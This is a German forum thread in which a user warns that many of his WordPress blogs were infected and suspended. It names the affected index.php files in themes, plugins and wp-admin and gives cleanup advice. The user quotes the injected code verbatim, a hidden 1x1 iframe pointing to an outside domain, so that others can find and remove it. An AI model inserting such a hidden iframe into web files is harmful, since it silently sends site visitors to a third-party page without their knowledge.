Beiträge von NeuerUSER

    Ganz ernsthaft jetzt:

    a) Danke für den Anti-Malware-Tipp.

    b) Teilweise sind es meine eigenen Scripte und da ist das definitiv nicht drin. Punkt und aus. Ich schreibe alle Scripte zeile für zeile von hand.

    c) Ich hab fast darauf gewartet, dass man von "Panikmache" spricht oder der Post kaputt gemacht wird. Ist fast in jedem Forum so. Ob Automarke oder Blogging-System. Besonders von Usern mit hohem PostRank. Auch wenn Ihr davon viel Ahnung hat

    Sorry, dass ich darauf hingewiesen habe. Eine softere Überschrift könnte dazu führen, dass es nicht gelesen wird.
    Ach ist mir doch egal.

    Tja, dann war's das wieder mit dem Forum.
    Ich stells in meinen Blog für die SERPS. :-)
    Bye.

    PS: Ich find den Punkt nicht, wo ich die Überschrift verharmlosen kann. Den Punkt zum Account-Löschen finde ich auch nicht auf die Fixe. Vielleicht ist ja ein Mod so nett, dann hat die liebe Seele wieder ruh.
    SeeYa

    Ja, ist bekannt.

    Ich habe den Supportchat mit dem Provider nicht gespeichert. Aber beispielsweise steckte der Link, der dann vom Provider als MALWARE erkannt wurde auch in:

    installiertes Standardtheme Twentyten index.php

    installiertes Plugin Realy Simple Captchar (Wichtig für ContactForm 7) und zwar dort in der index.php im TMP-Ordner

    in der index.php des wp-Optimize und in der Index.php des Plugins
    wp-mobil (oder so ähnlich - Es zeigt den Blog für Smarthphonebenuzter in einer mobilen Version an)

    Soweit krieg ich's noch zusammen.
    Wenn mir noch was einfällt, melde ich mich.

    Ah. Doch gespeichert. Als Mail. Also:
    index.php in
    wp-admin /
    wp-content /
    wp-content/themes
    wp-content/themes/twentyten/
    und weitere
    etc.

    sateffen
    Sicher steckt der Code in den Themes und Plugins. Nur wie kommt er da rein? Besonders in meinen eigenenen Themes ist sowas nicht drin.
    Das passiert nicht auf 21 Blogs gleichzeitig, von denen jetzt 16 suspendiert sind.

    Update:
    Das Standardtheme twentyten wird von mir nicht benutzt, ist aber für Umbauarbeiten auf dem Hoster installiert. Falls mal was schief geht.
    Kurios, dass es auch da drin ist.

    Die neueste und die davor auf einigen Blogs. Bei der Menge, schaffe ich die Updates nie rechtzeitig bei der Updatefähigkeit von WordPress.

    "//Silence ist golden" gehört aber nicht in die Themes, die ich verwende. Ich habe auch diesen Eintrag an anderen Stellen gefunden, wo der Bali-Link noch nicht drin war. Keine Ahnung wo es herkommt. Vielleicht versucht der Bot erst das zu schreiben und knallt den Bali-Link hinterher.

    Editiert:


    Überprüft bitte (eventuell und wenn ihr mal zeit habt oder eure seite vom provider gesperrt wurde) Eure Blogs und dort bitte unbedingt (muss aber nicht) [COLOR=Red]alle [/COLOR]Index.php-Dateien - in Themes und Plugins usw. auf folgende Codezeile und löscht diese.

    [COLOR=Red]

    PHP
    Example of malware script: <iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe>

    [/COLOR]

    Vor dem Code steht manchmal noch // Silence is golden oder ähnlicher Mist.


    Es schreibt sich in fast alle index-Dateien. Mir sind gerade 12 (editiert: 21) Blogs ausgestiegen. Derzeitg betroffen Server von One.com, easyhost, alphahosting).

    Ein Hacker oder der Wurm dessen scheint sich an WordPress-Blogs austoben zu wollen.
    ( Editiert: Muss aber nicht sein. Kann auch Eure Schuld sein. Vielleicht seid Ihr nur schlechte Programmierer. Wer weiß das schon? )

    Dringend Backup machen via FTP.
    Dann alle Dateien überprüfen und bei Bedarf wieder aufspielen.
    (Editiert: auch die auf dem Rechner vorhandenen Dateien überprüfen. Tipps für gute Anti-Malware-Programme gibts in diesem Thread.)